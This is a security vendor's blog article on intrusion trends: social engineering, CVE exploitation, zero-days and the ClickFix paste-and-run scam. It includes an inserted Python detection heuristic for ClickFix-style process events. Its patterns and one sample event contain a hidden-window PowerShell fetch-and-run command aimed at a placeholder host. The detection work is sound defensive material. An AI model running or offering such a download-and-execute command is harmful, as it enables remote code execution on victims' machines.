Social Engineering and Cyberattacks

    From Code to Conversation: How Social Engineering Powers Modern Cyberattacks

    Social engineering accounted for 36% of all intrusion points between May 2024 and 2025, according to Palo Alto Networks. It surpassed malware and software vulnerabilities for the top spot. IBM found that credential theft was the top access point last year, accounting for 30% of system invasions. These figures support the notion that cybercriminals prefer to log in instead of hack in, exploiting humans to gain access to systems.

    Recent Trends in Cyberattacks: Which Entry Methods Are on The Rise

    While social engineering stands out at the top, the last year has seen the rise of multiple entry techniques. Cybercriminals have put new twists on some familiar formulas, utilizing advancements in technology and online communication. Our analysts most frequently encounter the following infiltration methods.

    Public Vulnerabilities

    These types of attacks occur when documented vulnerabilities are targeted to gain unauthorized access to a system. They often consist of exploiting outdated software or misconfigured systems.

    There were 23,581 new vulnerabilities published by Common Vulnerabilities and Exposures (CVE) in the first half of 2025. This averages out to roughly 130 new CVEs per day, a 15% increase from 2024.

    Despite social engineering taking the top spot, experts documented a rise in public vulnerabilities exploited in 2024. There were 768 CVE-identified vulnerabilities reported in the wild last year, up 20% from 2023.

    IBM found that 30% of the incidents they responded to in 2024 involved exploitation of public-facing applications. They cited patch management challenges as a major culprit. On top of this, 25% of these cases involved active scanning after entry — allowing for further exploitation.

    This upward trend has continued in 2025. The first quarter of the year saw 159 CVE-identified vulnerabilities exploited, up from 151 the year prior. Furthermore, 28.3% of these vulnerabilities were exploited within 24 hours of their CVE publication.

    These attacks are popular among cybercriminals because they are cheap and require minimal effort. Cybercriminals buy and sell Access as a Service (AaaS) kits for these exploits on the dark web. The flip side is that the underlying vulnerabilities are often patched quickly with software updates.

    Zero-Day Exploits

    These types of attacks target vulnerabilities that are unknown to developers and the public. The name comes from the number of days the developer has to patch the vulnerability before an exploit occurs: zero.

    Zero-day attacks often target large organizations, specifically government agencies and software developers. The cybercriminal needs to gain access to the program’s code to identify vulnerabilities before the developer has an opportunity to recognize and patch them.

    This information is typically obtained by large hacking groups, some of which are state-funded. Cybercriminals may then sell this data on dark web marketplaces, increasing accessibility and expanding the scope of exploitation.

    Forescout Technologies noted a 46% increase in zero-day exploits in the first half of 2025. This is on pace to break the record-high 100 zero-day exploits reported just last year, continuing an upward trend.

    This past March, there were 19 zero-day exploits — the most in any individual month over the last three years. The lowest number of zero-day attacks in a one-month span this calendar year has been seven.

    Social Engineering

    As we previously stated, cybercriminals have been increasingly relying on human error rather than technical workarounds to infiltrate systems. 2025 has seen social engineering not only take over the top infiltration slot, but also take on new forms.

    Two methods that stand out are high-touch compromise and at-scale deception. The former involves cybercriminals impersonating staff members using stolen credentials. They then escalate their access discreetly and without malware, opting to manipulate help desks.

    At-scale deception occurs when bad actors manipulate users to download malware through pop-up ads and SEO-boosted malicious links. An example of this is the ClickFix scam campaign, where cybercriminals tricked unsuspecting users into copying and pasting malicious code into their device’s terminal.

    This is done through a malicious or compromised website. When the user opens the page, they are met with a pop-up instructing them to copy and paste the code to allegedly fix an issue on the device. When the code is pasted, further malicious programs are injected onto the device.
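
    A defender-side illustration of the paste-and-run pattern described above, added here as an example and not taken from the original article: a heuristic triage over process-creation events. The event fields, the shell and parent lists, the indicator weights and the sample events are all assumptions constructed for this example.

```python
import re

# Assumptions for this example: shells a pasted command would start, and the
# parent process that indicates a user launched it interactively.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}

# Heuristic indicators with weights (illustrative, not a vendor rule set).
INDICATORS = [
    (re.compile(r"https?://", re.I), 2, "remote URL in command line"),
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), 2, "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"\|\s*(iex|invoke-expression)\b", re.I), 3, "output piped to interpreter"),
    (re.compile(r"not a robot|captcha|verification id", re.I), 3, "lure text in comment"),
]

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    if basename(event["image"]) not in SHELLS:
        return 0, []
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return 0, []
    hits = [(w, why) for rx, w, why in INDICATORS if rx.search(event["cmdline"])]
    return sum(w for w, _ in hits), [why for _, why in hits]

def triage(events, threshold=4):
    """Return (host, score, reasons) for events at or above the threshold."""
    scored = [(e["host"], *score_event(e)) for e in events]
    return [row for row in scored if row[1] >= threshold]

# Constructed sample events; hosts, paths and the .invalid URL are made up.
SAMPLE_EVENTS = [
    {"host": "ws-014", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://example.invalid/fix | iex" # I am not a robot'},
    {"host": "ws-022", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ipconfig /all"},
    {"host": "build-03", "parent": r"C:\ci\agent.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": r'pwsh -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"'},
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(host, score, "; ".join(reasons))
```

    Only the first sample event is flagged: the second has an interactive parent but no indicators, and the third has indicators but was started by an automation agent rather than by a user.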

    The majority of social engineering cases continue to derive from phishing attacks, accounting for 65% of entry points reported. However, the development of new methods displays the evolution of this strategy that has led to its expanded popularity.

    Beyond their prevalence, infiltrations through social engineering also carry higher odds of exposure. Social engineering attacks resulted in data exposure in a whopping 60% of cases. This is a 14% increase over the exposure rate when looking at all infiltration cases.

    Our experts expect these trends to continue as cybercriminals increasingly use artificial intelligence to enhance their social engineering scams. Generative AI can automate and refine phishing attacks with convincing emails, deepfake media, and fraudulent online profiles.

    Comparison Table

    Type of Attack         | Accessibility | Effectiveness | Attacker Risk | Frequency | Example
    Public Vulnerabilities | High          | Moderate      | Low           | Common    | RDP on an exposed server
    Zero-Day Exploits      | Very Low      | Very High     | Very High     | Rare      | 0-day in a browser
    Social Engineering     | High          | High          | Moderate      | Constant  | Email phishing campaign

    Why Every Intrusion Method Should Be Taken Seriously

    Social engineering may be the most common form of infiltration, but it doesn’t mean you should underestimate other tactics. Each entry method holds the potential to do worlds of damage to both individuals and entire corporations.

    Furthermore, cybercriminals often use a hybrid approach and combine features of multiple entry techniques in one scam. A prime example is the ClickFix scam, where cybercriminals used social engineering to deploy Remote Access Trojans (RATs) to perpetrate the crime.

    Because of this, our experts recommend that all users be aware of these threats and that the systems themselves have a layered defense. It is not enough to rely on security software. Organizations must also train the users of their systems and put proper procedures in place to avoid unauthorized access.

    Practical Takeaway from Digital Forensics Corp.

    The team at Digital Forensics Corp. brings hands-on expertise in defending against threats across all three levels outlined above. Our experts are SOC 2 certified among other digital forensics and security certifications. We understand that modern threat actors rarely limit themselves to one approach, and we constantly adapt with modern techniques.

    We can evaluate your current security system to identify any vulnerable points and suggest resolutions. Our experts can also collaborate with your IT team to ensure the implementation of our suggestions is successful. Lastly, we can help you build multi-layered defense strategies that address both the human and technical sides of risk. Contact us today or explore our cybersecurity services page to learn more about the solutions we can provide.


